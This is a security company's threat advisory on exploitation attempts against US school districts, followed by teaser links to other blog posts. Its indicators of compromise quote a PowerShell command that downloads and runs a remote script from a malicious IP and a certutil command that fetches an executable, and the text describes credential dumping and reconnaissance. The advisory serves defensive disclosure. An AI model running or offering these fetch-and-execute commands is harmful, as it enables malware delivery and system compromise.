US School District Exploitation Attempts

May 2, 2022 | News

There is recent increased activity targeting school districts across the United States that appear to be staging for ransomware and numerous crypto-mining campaigns targeting critical remote and authentication servers for students.

Related Indicators of Compromise

  • 185.101.107[.]92
  • powershell iex(New-Object Net.WebClient).DownloadString(‘hxxp://185.101.107[.]92/lol.ps1’)
  • “certutil.exe -urlcache -split -f hxxp:///checkit2.exe c:/windows/temp/checkit2.exe”

Summary of Exploitation Attempts

Detections have shown traffic to 185.101.107[.]92, an IP geolocated in Bucharest, Romania, which is flagged as malicious by 16 vendors on VirusTotal and is reported to be associated with crypto mining activity as per AbuseIPDB. Shodan also reports the IP belongs to an ubuntu machine with ports 21, 22, and 80 exposed, which suggests this is maybe a staging point for the threat actors to conceal their actual IP address.

Malicious Java processes spawning PowerShell and cmd prompts executing internal enumeration, privilege escalation, credential theft, and external downloads via PowerShell have been observed.

Starting with a common threat actor tactic known as a download cradle to download post-exploitation and exfiltration tools and loading them straight into memory (evading detection on disk), we are also seeing malicious usage of certutil.exe which is a legitimate Windows executable commonly used to display certification authority configuration information and retrieve certificates. However, it is used maliciously by these threat actors to remotely download a payload as opposed to a certificate.

In this case, an executable may be stored in the temp folder and could easily be overlooked without proper investigation. Detections for lsass dumping (credential theft) were also observed and are typically found when tools like mimikatz or procdump are executed. These tools can be abused to steal credentials for exfiltration and password cracking as well as an escalation of privilege, allowing the threat actor one step closer to domain admin and completing their actions on objectives.

In one school district case, discovery found: whoami, systeminfo, ipconfig, net user, net local admin, net group “domain computers”, and many more reconnaissance commands. In another case, multiple users and a service account with high privilege were identified as having connected to the associated malicious IP.

Recommendations

  • Use Geo-IP and block access to/from Romania if not needed in your environment
  • Create access lists to block 185.101.107.92
  • Review Internet traffic for any Indicators of Compromise

If you would like more information about this topic, please visit our get in touch page and contact us today.

Tags:

Recent Posts

Is Microsoft Copilot for M365 Right for Your Business?

Is Microsoft Copilot for M365 Right for Your Business?

There’s been a lot of buzz around the highly anticipated limited launch of Copilot for M365 by Microsoft. People are talking, and understandably so. It's got everyone excited and curious, but it's also raised some valid security questions. Let's dive in and explore...

Why Invest in Physical Security Technology?

Why Invest in Physical Security Technology?

In an increasingly digital world, it's easy to overlook the importance of physical security. However, the safety of physical assets, whether it's your office building or equipment, remains a crucial aspect of overall business security. So, continue reading to learn...

The Basic Guide to Cyber Insurance

The Basic Guide to Cyber Insurance

With the ever-changing world of cybersecurity, it’s more important than ever for businesses to manage potential risks and keep their data safe. While the advancement in technology has made our lives easier, it has also caused a major rise in cyber threats....

High Point Networks Welcomes Chief Financial Officer

High Point Networks Welcomes Chief Financial Officer

Press Release January 11, 2023 – West Fargo, ND, High Point Networks, adds Chad Rieth as Chief Financial Officer. High Point Networks proudly welcomes Rieth, who brings more than three decades of experience in the financial industry with him. For the past 15 years, he...

We're Here to Help

Curious about our services? Need to chat with support?

High Point Networks happy team members